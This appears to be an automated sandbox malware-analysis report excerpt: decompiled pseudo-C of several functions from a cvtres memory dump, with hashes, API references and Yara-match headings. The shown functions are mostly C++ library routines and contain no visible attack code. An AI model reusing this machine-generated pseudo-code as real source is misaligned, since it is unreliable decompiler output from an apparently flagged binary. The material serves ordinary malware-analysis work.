                                                                    • Instruction ID: b813a3aab00f77bb49292ce9513a68c51c2533bd51e460e3b6aaa5db3685e307
                                                                    • Opcode Fuzzy Hash: a42c2bce63919a1d40cd009a0b5b961e4d63c1d9277672bf13a03d12b4d4731c
                                                                    • Instruction Fuzzy Hash: 45513F7590014AEECE31ABE28CC5C9F763CE689B0CB21993BF115F2193C638CD45DA69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00413C85 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 84%
                                                                    			E00413C85(void* __ebx, signed int* __ecx, void* __edi, signed int __esi, void* __eflags) {
				intOrPtr _t48;
				signed int _t53;
				void* _t58;
				intOrPtr _t59;
				intOrPtr _t62;
				void* _t63;
				void* _t65;
				intOrPtr* _t67;
				signed int* _t68;
				void* _t75;
				signed int _t77;
				intOrPtr _t85;
				signed int* _t89;
				signed int _t93;
				void* _t96;
				void* _t97;

				_push(0x2c);
				E0042083E(E00433C31, __ebx, __edi, __esi);
				_t72 =  *(_t96 + 8);
				_t91 = __esi | 0xffffffff;
				_t89 = __ecx;
				if(_t72 != _t91) {
					_t77 =  *( *(__ecx + 0x24));
					__eflags = _t77;
					if(_t77 == 0) {
						L6:
						__eflags = _t89[0x15];
						if(_t89[0x15] != 0) {
							E004145CB(_t89);
							__eflags = _t89[0x11];
							if(__eflags != 0) {
								 *(_t96 - 0x2d) = _t72;
								E004142E1(_t72, _t89, _t96 - 0x2c, __eflags);
								_t11 = _t96 - 4;
								 *_t11 =  *(_t96 - 4) & 0x00000000;
								__eflags =  *_t11;
								while(1) {
									__eflags =  *((intOrPtr*)(_t96 - 0x18)) - 0x10;
									_t48 =  *((intOrPtr*)(_t96 - 0x2c));
									if( *((intOrPtr*)(_t96 - 0x18)) >= 0x10) {
										_t85 =  *((intOrPtr*)(_t96 - 0x2c));
									} else {
										_t48 = _t96 - 0x2c;
										_t85 = _t48;
									}
									_t78 = _t89[0x11];
									_t93 =  *(_t89[0x11]);
									_t72 =  *((intOrPtr*)(_t96 - 0x1c)) + _t48;
									_t53 =  *((intOrPtr*)(_t93 + 0x14))( &(_t89[0x13]), _t96 - 0x2d, _t96 - 0x2c, _t96 - 0x38, _t85,  *((intOrPtr*)(_t96 - 0x1c)) + _t48, _t96 - 0x34);
									__eflags = _t53;
									if(_t53 < 0) {
										break;
									}
									__eflags = _t53 - 1;
									if(_t53 > 1) {
										__eflags = _t53 - 3;
										if(__eflags != 0) {
											break;
										}
										_push(_t89[0x15]);
										_push( *(_t96 - 0x2d));
										_t58 = E0041ED88(_t72, _t89, _t93, __eflags);
										_t91 = _t93 | 0xffffffff;
										__eflags = _t58 - _t91;
										if(_t58 == _t91) {
											L31:
											E00404354(_t96 - 0x2c, 1, 0);
											goto L7;
										}
										L29:
										_t91 =  *(_t96 + 8);
										goto L31;
									}
									__eflags =  *((intOrPtr*)(_t96 - 0x18)) - 0x10;
									_t59 =  *((intOrPtr*)(_t96 - 0x2c));
									if( *((intOrPtr*)(_t96 - 0x18)) < 0x10) {
										_t59 = _t96 - 0x2c;
									}
									_t93 =  *((intOrPtr*)(_t96 - 0x34)) - _t59;
									__eflags = _t93;
									if(_t93 == 0) {
										L22:
										_t89[0x12] = 1;
										__eflags =  *((intOrPtr*)(_t96 - 0x38)) - _t96 - 0x2d;
										if( *((intOrPtr*)(_t96 - 0x38)) != _t96 - 0x2d) {
											goto L29;
										}
										__eflags = _t93;
										if(_t93 != 0) {
											continue;
										}
										__eflags =  *((intOrPtr*)(_t96 - 0x1c)) - 0x20;
										if( *((intOrPtr*)(_t96 - 0x1c)) >= 0x20) {
											break;
										}
										_push(_t93);
										_t75 = 8;
										E0040C3CF(_t75, _t78, _t96 - 0x2c, _t96);
										continue;
									} else {
										__eflags =  *((intOrPtr*)(_t96 - 0x18)) - 0x10;
										_t62 =  *((intOrPtr*)(_t96 - 0x2c));
										if(__eflags < 0) {
											_t62 = _t96 - 0x2c;
										}
										_push(_t89[0x15]);
										_push(_t93);
										_push(1);
										_push(_t62);
										_t63 = E0041FA4B(_t72, _t85, _t89, _t93, __eflags);
										_t97 = _t97 + 0x10;
										__eflags = _t93 - _t63;
										if(_t93 != _t63) {
											break;
										}
										goto L22;
									}
								}
								_t91 = _t93 | 0xffffffff;
								__eflags = _t93 | 0xffffffff;
								goto L31;
							}
							_push(_t89[0x15]);
							_push(_t72);
							_t65 = E0041ED88(_t72, _t89, _t91, __eflags);
							__eflags = _t65 - _t91;
							if(_t65 != _t91) {
								L2:
								return E00420888(_t72, _t89, _t91);
							}
						}
						L7:
						goto L2;
					}
					_t67 =  *((intOrPtr*)(__ecx + 0x34));
					__eflags = _t77 -  *_t67 + _t77;
					if(_t77 >=  *_t67 + _t77) {
						goto L6;
					}
					 *_t67 =  *_t67 - 1;
					_t89 =  *(__ecx + 0x24);
					_t68 =  *_t89;
					 *_t89 =  &(_t68[0]);
					 *_t68 = _t72;
					goto L2;
				}
				goto L2;
			}



















                                                                    0x00413c85
                                                                    0x00413c8c
                                                                    0x00413c91
                                                                    0x00413c94
                                                                    0x00413c97
                                                                    0x00413c9b
                                                                    0x00413caa
                                                                    0x00413cac
                                                                    0x00413cae
                                                                    0x00413ccd
                                                                    0x00413ccd
                                                                    0x00413cd1
                                                                    0x00413cd9
                                                                    0x00413cde
                                                                    0x00413ce2
                                                                    0x00413cfd
                                                                    0x00413d00
                                                                    0x00413d05
                                                                    0x00413d05
                                                                    0x00413d05
                                                                    0x00413d09
                                                                    0x00413d09
                                                                    0x00413d0d
                                                                    0x00413d10
                                                                    0x00413da8
                                                                    0x00413d16
                                                                    0x00413d16
                                                                    0x00413d19
                                                                    0x00413d19
                                                                    0x00413d1b
                                                                    0x00413d1e
                                                                    0x00413d27
                                                                    0x00413d3b
                                                                    0x00413d3e
                                                                    0x00413d40
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00413d46
                                                                    0x00413d49
                                                                    0x00413db0
                                                                    0x00413db3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00413db9
                                                                    0x00413dbc
                                                                    0x00413dbd
                                                                    0x00413dc2
                                                                    0x00413dc7
                                                                    0x00413dc9
                                                                    0x00413dd3
                                                                    0x00413dda
                                                                    0x00000000
                                                                    0x00413dda
                                                                    0x00413dcb
                                                                    0x00413dcb
                                                                    0x00000000
                                                                    0x00413dcb
                                                                    0x00413d4b
                                                                    0x00413d4f
                                                                    0x00413d52
                                                                    0x00413d54
                                                                    0x00413d54
                                                                    0x00413d5a
                                                                    0x00413d5a
                                                                    0x00413d5c
                                                                    0x00413d7d
                                                                    0x00413d80
                                                                    0x00413d84
                                                                    0x00413d87
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00413d89
                                                                    0x00413d8b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00413d91
                                                                    0x00413d95
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00413d97
                                                                    0x00413d9a
                                                                    0x00413d9e
                                                                    0x00000000
                                                                    0x00413d5e
                                                                    0x00413d5e
                                                                    0x00413d62
                                                                    0x00413d65
                                                                    0x00413d67
                                                                    0x00413d67
                                                                    0x00413d6a
                                                                    0x00413d6d
                                                                    0x00413d6e
                                                                    0x00413d70
                                                                    0x00413d71
                                                                    0x00413d76
                                                                    0x00413d79
                                                                    0x00413d7b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00413d7b
                                                                    0x00413d5c
                                                                    0x00413dd0
                                                                    0x00413dd0
                                                                    0x00000000
                                                                    0x00413dd0
                                                                    0x00413ce4
                                                                    0x00413cea
                                                                    0x00413ceb
                                                                    0x00413cf1
                                                                    0x00413cf6
                                                                    0x00413c9f
                                                                    0x00413ca4
                                                                    0x00413ca4
                                                                    0x00413cf8
                                                                    0x00413cd3
                                                                    0x00000000
                                                                    0x00413cd3
                                                                    0x00413cb0
                                                                    0x00413cb7
                                                                    0x00413cb9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00413cbb
                                                                    0x00413cbd
                                                                    0x00413cc0
                                                                    0x00413cc5
                                                                    0x00413cc7
                                                                    0x00000000
                                                                    0x00413cc9
                                                                    0x00000000

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _fputc$H_prolog3_
                                                                    • String ID:
                                                                    • API String ID: 668804286-3916222277
                                                                    • Opcode ID: c0ed616817cea286eb02bf539f528bf657eba571351e207018cb105a92e1eec3
                                                                    • Instruction ID: e11441ca7ad80cdd48506b504b0b9aa4bc3c957bba98ad18be85b308e557b614
                                                                    • Opcode Fuzzy Hash: c0ed616817cea286eb02bf539f528bf657eba571351e207018cb105a92e1eec3
                                                                    • Instruction Fuzzy Hash: E7415232A005199FDF20DFA8D480AEEB7B4BF18716F10451BE911B7280D738EA85CBD9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00414796 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 68%
                                                                    			E00414796(void* __ebx, void* __edi, signed int* __esi) {
				unsigned int _t36;
				unsigned int _t37;
				signed int _t41;
				signed int _t44;
				void* _t55;
				signed int _t56;
				signed int _t59;
				signed int _t60;
				unsigned int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int* _t72;
				signed int _t76;
				signed int _t77;
				signed int _t78;
				void* _t80;
				signed int _t81;
				signed int _t82;
				signed int* _t85;
				signed int* _t86;
				void* _t87;

				_t85 = __esi;
				_t55 = __ebx;
				_t59 =  *__esi;
				_push(__edi);
				asm("cdq");
				_t76 = 0x1c;
				_t77 = (__esi[1] - _t59) / _t76;
				if(_t77 > 0x9249248) {
					E0041CFA0("vector<T> too long");
				}
				asm("cdq");
				_t60 = 0x1c;
				_t36 = (_t85[2] - _t59) / _t60;
				_t78 = _t77 + 1;
				if(_t78 <= _t36) {
					return _t36;
				} else {
					_t61 = _t36;
					_t37 = _t36 >> 1;
					if(0x9249249 - _t37 >= _t61) {
						_t62 = _t61 + _t37;
						__eflags = _t62;
					} else {
						_t62 = 0;
					}
					if(_t62 < _t78) {
						_t62 = _t78;
					}
					_t72 = _t85;
					_pop(_t80);
					_push(8);
					E00420808(E00434170, _t55, _t80, _t85);
					_t56 = _t62;
					_t86 = _t72;
					if(_t56 > 0x9249249) {
						E0041CFA0("vector<T> too long");
					}
					_t41 = _t86[2] -  *_t86;
					asm("cdq");
					_t63 = 0x1c;
					_t42 = _t41 / _t63;
					_t95 = _t41 / _t63 - _t56;
					if(_t41 / _t63 < _t56) {
						_t44 = E00414893(_t56, _t80, _t86);
						 *(_t87 - 4) =  *(_t87 - 4) & 0x00000000;
						 *(_t87 - 0x14) = _t44;
						_push( *(_t87 - 0x14));
						_push( *(_t87 - 0x14));
						_push(_t86[1]);
						E00414C0F(_t56,  *_t86, _t95);
						_t66 =  *_t86;
						asm("cdq");
						_t81 = 0x1c;
						_t82 = (_t86[1] - _t66) / _t81;
						if(_t66 != 0) {
							E0040D51F(_t66, _t86[1]);
							_push( *_t86);
							E0041E1F1();
						}
						_t42 =  *(_t87 - 0x14);
						_t86[2] = _t56 * 0x1c + _t42;
						_t86[1] = _t82 * 0x1c + _t42;
						 *_t86 = _t42;
					}
					return E00420874(_t42);
				}
			}

























                                                                    0x00414796
                                                                    0x00414796
                                                                    0x00414796
                                                                    0x0041479b
                                                                    0x004147a0
                                                                    0x004147a1
                                                                    0x004147a4
                                                                    0x004147ac
                                                                    0x004147b3
                                                                    0x004147b3
                                                                    0x004147bf
                                                                    0x004147c0
                                                                    0x004147c1
                                                                    0x004147c3
                                                                    0x004147c6
                                                                    0x004147ec
                                                                    0x004147c8
                                                                    0x004147c8
                                                                    0x004147ca
                                                                    0x004147d5
                                                                    0x004147db
                                                                    0x004147db
                                                                    0x004147d7
                                                                    0x004147d7
                                                                    0x004147d7
                                                                    0x004147df
                                                                    0x004147e1
                                                                    0x004147e1
                                                                    0x004147e3
                                                                    0x004147e5
                                                                    0x004147ed
                                                                    0x004147f4
                                                                    0x004147f9
                                                                    0x004147fb
                                                                    0x00414803
                                                                    0x0041480a
                                                                    0x0041480a
                                                                    0x00414812
                                                                    0x00414816
                                                                    0x00414817
                                                                    0x00414818
                                                                    0x0041481a
                                                                    0x0041481c
                                                                    0x00414820
                                                                    0x00414825
                                                                    0x0041482b
                                                                    0x0041482e
                                                                    0x00414834
                                                                    0x00414837
                                                                    0x00414838
                                                                    0x0041483d
                                                                    0x00414849
                                                                    0x0041484a
                                                                    0x0041484d
                                                                    0x00414851
                                                                    0x00414858
                                                                    0x0041485d
                                                                    0x0041485f
                                                                    0x00414864
                                                                    0x00414865
                                                                    0x00414872
                                                                    0x00414875
                                                                    0x00414878
                                                                    0x00414878
                                                                    0x0041487f
                                                                    0x0041487f

                                                                    APIs
                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004147B3
                                                                      • Part of subcall function 0041CFA0: std::exception::exception.LIBCMT ref: 0041CFB5
                                                                      • Part of subcall function 0041CFA0: __CxxThrowException@8.LIBCMT ref: 0041CFCA
                                                                      • Part of subcall function 0041CFA0: std::exception::exception.LIBCMT ref: 0041CFDB
                                                                    • __EH_prolog3_catch.LIBCMT ref: 004147F4
                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0041480A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
                                                                    • String ID: vector<T> too long
                                                                    • API String ID: 2448322171-3788999226
                                                                    • Opcode ID: 6b7a71ee07559251e7a88e94207761f64fcc3fa7f0496beaba7eae0e72a277a5
                                                                    • Instruction ID: af6e26ebaf4091a82c7bbf81281d331d377815d3cd0bf7965de59ac72cfe8f5b
                                                                    • Opcode Fuzzy Hash: 6b7a71ee07559251e7a88e94207761f64fcc3fa7f0496beaba7eae0e72a277a5
                                                                    • Instruction Fuzzy Hash: 3A21273AB402018BC718EE7ED985A6EF6D29FD5704B21483FF152D7280DA78DCC14758
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00415522 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 57%
                                                                    			E00415522(intOrPtr __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t27;
				void* _t40;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t58;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t71;
				signed int _t72;
				void* _t74;

				_t58 = __edx;
				_t49 = __ebx;
				_t72 = _t74 - 0xfc;
				_t27 =  *0x443674; // 0x393162b1
				 *(_t72 + 0x100) = _t27 ^ _t72;
				_push(4);
				E004207D5(E00433B88, __ebx, __edi, __esi);
				_t60 = 0xf;
				 *((intOrPtr*)(_t72 - 0x10)) = 0;
				 *((intOrPtr*)(_t72 + 0x4c)) = _t60;
				 *((intOrPtr*)(_t72 + 0x48)) = 0;
				 *((char*)(_t72 + 0x38)) = 0;
				 *((intOrPtr*)(_t72 - 4)) = 0;
				 *((short*)(_t72 + 0x54)) = 0;
				E00426300(_t72 + 0x56, 0, 0xa8);
				_push(0x55);
				_push(_t72 + 0x54);
				if( *0x44631c() != 0) {
					E00415ADE(_t72 + 0x1c, _t72 + 0x54);
					 *((char*)(_t72 - 4)) = 1;
					_t40 = E0041607C(_t72 + 0x1c, _t58, _t72);
					 *((char*)(_t72 - 4)) = 2;
					E004042ED(_t72 + 0x38, _t40);
					E00404354(_t72, 1, 0);
					 *((char*)(_t72 - 4)) = 0;
					E0040C148(0, _t72 + 0x1c, 1);
					 *(__ebx + 0x10) =  *(__ebx + 0x10) & 0;
					 *((intOrPtr*)(__ebx + 0x14)) = 0xf;
					 *((char*)(__ebx)) = 0;
					E004042ED(__ebx, _t72 + 0x38);
					_push(0);
				} else {
					 *((intOrPtr*)(__ebx + 0x14)) = _t60;
					 *(__ebx + 0x10) = 0;
					 *((char*)(__ebx)) = 0;
					E00404331(__ebx, "Unknown");
					_push(0);
				}
				E00404354(_t72 + 0x38);
				 *[fs:0x0] =  *((intOrPtr*)(_t72 - 0xc));
				_t64 = 1;
				_pop(_t71);
				_pop(_t50);
				return E0041DA9B(_t49, _t50,  *(_t72 + 0x100) ^ _t72, _t58, _t64, _t71);
			}














                                                                    0x00415522
                                                                    0x00415522
                                                                    0x00415529
                                                                    0x0041552d
                                                                    0x00415534
                                                                    0x0041553a
                                                                    0x00415541
                                                                    0x0041554a
                                                                    0x0041554b
                                                                    0x0041554e
                                                                    0x00415551
                                                                    0x00415554
                                                                    0x0041555a
                                                                    0x00415562
                                                                    0x0041556b
                                                                    0x00415573
                                                                    0x00415578
                                                                    0x00415581
                                                                    0x004155a2
                                                                    0x004155ad
                                                                    0x004155b1
                                                                    0x004155bb
                                                                    0x004155bf
                                                                    0x004155cb
                                                                    0x004155d7
                                                                    0x004155db
                                                                    0x004155e0
                                                                    0x004155e3
                                                                    0x004155ef
                                                                    0x004155f2
                                                                    0x004155f7
                                                                    0x00415583
                                                                    0x00415583
                                                                    0x00415586
                                                                    0x00415590
                                                                    0x00415593
                                                                    0x00415598
                                                                    0x00415598
                                                                    0x004155fe
                                                                    0x00415608
                                                                    0x00415610
                                                                    0x00415611
                                                                    0x00415612
                                                                    0x00415627

                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00415541
                                                                    • _memset.LIBCMT ref: 0041556B
                                                                    • GetUserDefaultLocaleName.KERNEL32(00000000,00000055,?,?,00000004), ref: 00415579
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DefaultH_prolog3LocaleNameUser_memset
                                                                    • String ID: Unknown
                                                                    • API String ID: 1926270201-1654365787
                                                                    • Opcode ID: 0d879948cb59eb1ea15295f325b7edfddf6b94f6d397e911dca6ecdd40f54d49
                                                                    • Instruction ID: 417e88528b010e53538cb3bb12a601a2e6796a3512ff39e0d3b0a7e19062a527
                                                                    • Opcode Fuzzy Hash: 0d879948cb59eb1ea15295f325b7edfddf6b94f6d397e911dca6ecdd40f54d49
                                                                    • Instruction Fuzzy Hash: 0231F671600258ABDB10EFA9CC417CD7BA4AF54704F40406FFE04EB2C2DBB89648C795
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00404927 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00404927(signed int __eax, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4) {
				void* __ebx;
				void* __esi;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr* _t18;
				intOrPtr* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr _t28;
				signed int _t31;
				intOrPtr* _t35;
				void* _t36;
				intOrPtr* _t37;
				void* _t38;

				_t38 = __ebp;
				_t36 = __edi;
				_t27 = _a4;
				_t37 = __eax;
				_t31 = __eax;
				if(E00404505(__eax, _a4) == 0) {
					_t14 =  *((intOrPtr*)(_t37 + 0x10));
					if((_t31 | 0xffffffff) - _t14 <= __edi) {
						_t14 = E0041CFA0("string too long");
					}
					if(_t36 != 0) {
						_t28 = _t14 + _t36;
						if(E004044A3(_t28, _t37, _t36, _t38, _t28, 0) != 0) {
							_t17 =  *((intOrPtr*)(_t37 + 0x14));
							if(_t17 < 0x10) {
								_t35 = _t37;
							} else {
								_t35 =  *_t37;
							}
							if(_t17 < 0x10) {
								_t18 = _t37;
							} else {
								_t18 =  *_t37;
							}
							E0041DCF0(_t18 + _t36, _t35,  *((intOrPtr*)(_t37 + 0x10)));
							if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
								_t21 = _t37;
							} else {
								_t21 =  *_t37;
							}
							E00420090(_t21, _a4, _t36);
							 *((intOrPtr*)(_t37 + 0x10)) = _t28;
							if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
								_t23 = _t37;
							} else {
								_t23 =  *_t37;
							}
							 *((char*)(_t23 + _t28)) = 0;
						}
					}
					return _t37;
				}
				if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
					_t24 = _t37;
				} else {
					_t24 =  *_t37;
				}
				return E0040482E(_t36, _t37, _t31, _t36, _t37, _t27 - _t24);
			}

















                                                                    0x00404927
                                                                    0x00404927
                                                                    0x00404928
                                                                    0x0040492d
                                                                    0x00404930
                                                                    0x00404939
                                                                    0x00404958
                                                                    0x00404962
                                                                    0x00404969
                                                                    0x00404969
                                                                    0x00404970
                                                                    0x00404972
                                                                    0x00404981
                                                                    0x00404983
                                                                    0x00404989
                                                                    0x0040498f
                                                                    0x0040498b
                                                                    0x0040498b
                                                                    0x0040498b
                                                                    0x00404994
                                                                    0x0040499a
                                                                    0x00404996
                                                                    0x00404996
                                                                    0x00404996
                                                                    0x004049a3
                                                                    0x004049af
                                                                    0x004049b5
                                                                    0x004049b1
                                                                    0x004049b1
                                                                    0x004049b1
                                                                    0x004049bd
                                                                    0x004049c9
                                                                    0x004049cc
                                                                    0x004049d2
                                                                    0x004049ce
                                                                    0x004049ce
                                                                    0x004049ce
                                                                    0x004049d4
                                                                    0x004049d4
                                                                    0x00404981
                                                                    0x00000000
                                                                    0x004049d8
                                                                    0x0040493f
                                                                    0x00404945
                                                                    0x00404941
                                                                    0x00404941
                                                                    0x00404941
                                                                    0x00000000

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _memmove$Xinvalid_argumentstd::_
                                                                    • String ID: string too long
                                                                    • API String ID: 1771113911-2556327735
                                                                    • Opcode ID: 937ef8314f4c0685631689a7c7ae684891f2464a59e84504085fdcdfdf634197
                                                                    • Instruction ID: 8616b515de50a051e8ed2ef309b9bb156470a8c1fb3f5f5963f810359020d125
                                                                    • Opcode Fuzzy Hash: 937ef8314f4c0685631689a7c7ae684891f2464a59e84504085fdcdfdf634197
                                                                    • Instruction Fuzzy Hash: 4511A1F030025097DA249E7D8985A2BB3E5EBC1710B10093FE6D2A72C2D7389C51879D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041615D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 79%
                                                                    			E0041615D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ecx;
				void* _t43;
				signed int _t51;
				void* _t52;
				intOrPtr* _t53;

				_t42 = __ebx;
				_push(0x9c);
				E004207D5(E00434503, __ebx, __edi, __esi);
				_t1 = _t52 - 0x10;
				 *_t1 =  *(_t52 - 0x10) & 0x00000000;
				_t55 =  *_t1;
				 *((intOrPtr*)(_t52 - 0xa8)) = 0x43f678;
				 *(_t52 - 4) = 1;
				 *(_t52 - 0x10) = 2;
				 *((intOrPtr*)(_t52 - 0x58)) = 0x43f624;
				E0041462B(_t52 - 0x58, _t52,  *_t1, _t52 - 0xa4);
				_t51 = 3;
				 *(_t52 - 4) = _t51;
				_t11 =  *((intOrPtr*)(_t52 - 0xa8)) + 4; // 0x50
				 *((intOrPtr*)(_t52 +  *_t11 - 0xa8)) = 0x43f674;
				_push(2);
				_push(_t52 - 0xa4);
				E00417359(__ebx, _t51,  *_t1);
				_push(_t43);
				 *(_t52 - 4) = 4;
				 *_t53 =  *((intOrPtr*)(_t52 + 0xc));
				_push(_t52 - 0xa8);
				E00416957(__ebx, _t43, __edi, _t51,  *_t1);
				E004171E5(_t52 - 0xa8,  *((intOrPtr*)(_t52 + 8)));
				 *(_t52 - 0x10) = _t51;
				 *(_t52 - 4) = 0;
				E004171A6(_t42, _t52 - 0x58, _t51, _t55);
				 *((intOrPtr*)(_t52 - 0x58)) = 0x43f2fc;
				E0041D1C9(_t52 - 0x58);
				return E00420874( *((intOrPtr*)(_t52 + 8)));
			}








                                                                    0x0041615d
                                                                    0x0041615d
                                                                    0x00416167
                                                                    0x0041616c
                                                                    0x0041616c
                                                                    0x0041616c
                                                                    0x00416170
                                                                    0x00416180
                                                                    0x0041618b
                                                                    0x00416192
                                                                    0x00416199
                                                                    0x004161a0
                                                                    0x004161a1
                                                                    0x004161aa
                                                                    0x004161ad
                                                                    0x004161b8
                                                                    0x004161c0
                                                                    0x004161c1
                                                                    0x004161c9
                                                                    0x004161ca
                                                                    0x004161d1
                                                                    0x004161da
                                                                    0x004161db
                                                                    0x004161e9
                                                                    0x004161f1
                                                                    0x004161f4
                                                                    0x004161f8
                                                                    0x00416201
                                                                    0x00416208
                                                                    0x00416216

                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00416167
                                                                      • Part of subcall function 0041462B: std::locale::_Init.LIBCPMT ref: 00414666
                                                                      • Part of subcall function 0041462B: std::locale::facet::_Incref.LIBCPMT ref: 00414674
                                                                      • Part of subcall function 00417359: __EH_prolog3.LIBCMT ref: 00417360
                                                                      • Part of subcall function 00416957: __EH_prolog3_catch.LIBCMT ref: 0041695E
                                                                      • Part of subcall function 004171A6: __EH_prolog3.LIBCMT ref: 004171AD
                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00416208
                                                                      • Part of subcall function 0041D1C9: std::ios_base::_Tidy.LIBCPMT ref: 0041D1EA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: H_prolog3$std::ios_base::_$H_prolog3_catchIncrefInitIos_base_dtorTidystd::locale::_std::locale::facet::_
                                                                    • String ID: (sA$trA
                                                                    • API String ID: 223534676-3915461764
                                                                    • Opcode ID: 54f604097232bf114aaba5d2fa76611655fbb11b5142e4927b8fc4a197872d8f
                                                                    • Instruction ID: 0451b7755276c2063532e152c92a7bbb1495ea8ba69575a182be0b2e210d4a96
                                                                    • Opcode Fuzzy Hash: 54f604097232bf114aaba5d2fa76611655fbb11b5142e4927b8fc4a197872d8f
                                                                    • Instruction Fuzzy Hash: 92110DB4D00219EFDF00EFD4C845BCDBBB4AF09308F10849AE548AB241C7B897888F59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00422891 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 30%
                                                                    			E00422891(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E004227FF(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E0042042A(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E00422270(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_t14 = _t22 + 0xc; // 0x6e
				_push(_t27);
				_push(_a4);
				_t20 = E004224E4(_t22,  *_t14, _t25, _t26, _t27, _t31);
				if(_t20 != 0) {
					E004203F1(_t20, _t27);
					return _t20;
				}
				return _t20;
			}











                                                                    0x00422891
                                                                    0x00422891
                                                                    0x00422891
                                                                    0x00422891
                                                                    0x00422891
                                                                    0x00422896
                                                                    0x0042289a
                                                                    0x0042289c
                                                                    0x0042289f
                                                                    0x004228a0
                                                                    0x004228a1
                                                                    0x004228a4
                                                                    0x004228a9
                                                                    0x004228a9
                                                                    0x004228ac
                                                                    0x004228b0
                                                                    0x004228b3
                                                                    0x004228b8
                                                                    0x004228b5
                                                                    0x004228b5
                                                                    0x004228b5
                                                                    0x004228bb
                                                                    0x004228c0
                                                                    0x004228c2
